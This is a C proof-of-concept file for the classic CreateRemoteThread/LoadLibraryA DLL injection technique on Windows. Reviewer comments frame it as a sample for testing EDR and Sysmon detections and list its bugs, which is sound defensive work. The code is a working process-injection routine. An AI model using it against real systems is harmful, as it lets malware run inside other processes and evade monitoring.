//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
// Proof of concept
//
// by Brian Mariani High-Tech Bridge
//
// www.htbridge.ch
//
// 01.09.2011
//
// Compiled with Dev-CPP 4.9.9.2
//
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//
// What this file demonstrates: the classic "remote thread + LoadLibraryA"
// DLL injection.  The DLL *path string* (not the DLL image) is copied into
// the target process and a new thread is started there with LoadLibraryA
// as its entry point and the copied path as its argument, so the target
// loads the DLL itself.
//
// Defender's view: the call sequence below -- OpenProcess with
// PROCESS_ALL_ACCESS on a foreign process, VirtualAllocEx with
// PAGE_EXECUTE_READWRITE, WriteProcessMemory, CreateRemoteThread whose start
// address resolves to kernel32!LoadLibraryA -- is the textbook pattern that
// process-injection telemetry (EDR / Sysmon event 8 "CreateRemoteThread",
// event 10 "ProcessAccess") keys on.  Useful as a known-good sample for
// validating that such detections fire.
//
// NOTE(review): the five header names were lost in extraction (angle
// brackets stripped); the code needs at least <windows.h>, <tlhelp32.h>,
// <stdio.h> and <string.h> -- confirm against the original source.
#include #include #include #include #include

int Inject_DLL(long pidProcAInjecter , char* dll_to_inject);
long ProcessToPid(char* process);

/*
 * Inject_DLL - load a DLL into another process by path.
 *
 * pidProcAInjecter: PID of the target process (0 makes OpenProcess fail).
 * dll_to_inject:    NUL-terminated path of the DLL; only the string
 *                   (strlen + 1 bytes) is written into the target.
 *
 * Returns 1 once the remote thread has been created, 0 on any failure.
 * No error detail is reported (GetLastError is never consulted).
 *
 * NOTE(review): MyHandle and ThreadReturn are never passed to CloseHandle,
 * on the success path or on any of the early returns, so both handles leak
 * for the lifetime of this process.  The function also does not wait for
 * the remote thread, so "injected" below only means "thread created".
 */
int Inject_DLL(long pidProcAInjecter , char* dll_to_inject)
{
    // Byte count of the path string including its terminator; this is the
    // size of the remote buffer, so a long is passed where SIZE_T is expected.
    long dll_size = strlen(dll_to_inject) + 1;
    printf("-> Opening the target process...\n");
    // PROCESS_ALL_ACCESS is far more than the operations below need and is
    // itself a high-signal event for process-access auditing.
    HANDLE MyHandle = OpenProcess(PROCESS_ALL_ACCESS , FALSE , pidProcAInjecter);
    if(MyHandle == NULL)return 0;
    printf("-> Memory Allocation...\n");
    // Remote buffer that will hold only the path string; it is committed as
    // PAGE_EXECUTE_READWRITE, which is what RWX-allocation detections flag.
    LPVOID MyAlloc = VirtualAllocEx( MyHandle , NULL , dll_size , MEM_COMMIT , PAGE_EXECUTE_READWRITE);
    if(MyAlloc == NULL) return 0;
    printf("-> Writing DLL in memory...\n");
    // Copies the path string (not the DLL contents) into the target; the
    // NULL last argument means bytes-written is not collected.
    int IsWriteOK = WriteProcessMemory( MyHandle , MyAlloc , dll_to_inject , dll_size , 0);
    if(IsWriteOK == 0) return 0;
    printf("-> Creating the Thread...\n");
    DWORD identificateurThread ;
    // Local address of LoadLibraryA is reused in the target; this relies on
    // kernel32 being mapped at the same base in both processes.
    LPTHREAD_START_ROUTINE addrLoadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32"),"LoadLibraryA");
    // The remote thread's start routine is LoadLibraryA and its single
    // parameter is the remote buffer holding the path, so the target process
    // performs the load.  Start address == LoadLibraryA is the detection key.
    HANDLE ThreadReturn= CreateRemoteThread( MyHandle , NULL , 0 , addrLoadLibrary , MyAlloc , 0 , &identificateurThread );
    if(ThreadReturn == NULL) return 0;
    // NOTE(review): every operand here has already been checked above, so
    // this condition is always true at this point.  Comparing the BOOL
    // IsWriteOK against the error code ERROR_INVALID_HANDLE is also a type
    // mix-up (WriteProcessMemory reports failure via GetLastError, not its
    // return value).
    if ((MyHandle != NULL) && (MyAlloc != NULL) && (IsWriteOK != ERROR_INVALID_HANDLE) && (ThreadReturn != NULL)) { printf("-> DLL injected :]\n"); }
    return 1;
}

/*
 * ProcessToPid - look up a PID by executable name via a Toolhelp snapshot.
 *
 * process: executable name compared exactly (case-sensitive strcmp) against
 *          PROCESSENTRY32.szExeFile, e.g. the image file name without path.
 *
 * Returns the PID of the first matching entry, or 0 if no match, if the
 * snapshot cannot be taken, or if Process32First fails.
 *
 * NOTE(review): the entry filled in by Process32First is never compared;
 * the loop starts with Process32Next, so the first snapshot entry is
 * skipped.  The early return after a failed Process32First also leaks the
 * snapshot handle.
 */
long ProcessToPid(char* process)
{
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    PROCESSENTRY32 structprocsnapshot = {0};
    // dwSize must be set before the first Process32First call.
    structprocsnapshot.dwSize = sizeof(PROCESSENTRY32);
    if(snapshot == INVALID_HANDLE_VALUE)return 0;
    if(Process32First(snapshot,&structprocsnapshot) == FALSE)return 0;
    while(Process32Next(snapshot,&structprocsnapshot) )
    {
        if(!strcmp(structprocsnapshot.szExeFile,process))
        {
            CloseHandle(snapshot);
            // NOTE(review): th32ProcessID is a DWORD; %lu would match the type.
            printf("Pid is -> %d\n",structprocsnapshot.th32ProcessID);
            return structprocsnapshot.th32ProcessID;
        }
    }
    CloseHandle(snapshot);
    return 0;
}

/*
 * main - usage: <program> <target_exe_name> <dll_path>
 *
 * NOTE(review): argc is never checked, so running with fewer than two
 * arguments passes NULL into strcmp/strlen (undefined behavior).  A PID of
 * 0 from ProcessToPid is not caught either; it simply makes OpenProcess
 * fail inside Inject_DLL.  Inject_DLL's return value is discarded and main
 * has no explicit return, so the exit status is always 0.
 */
int main(int argc , char* argv[])
{
    Inject_DLL(ProcessToPid(argv[1]),argv[2]);
}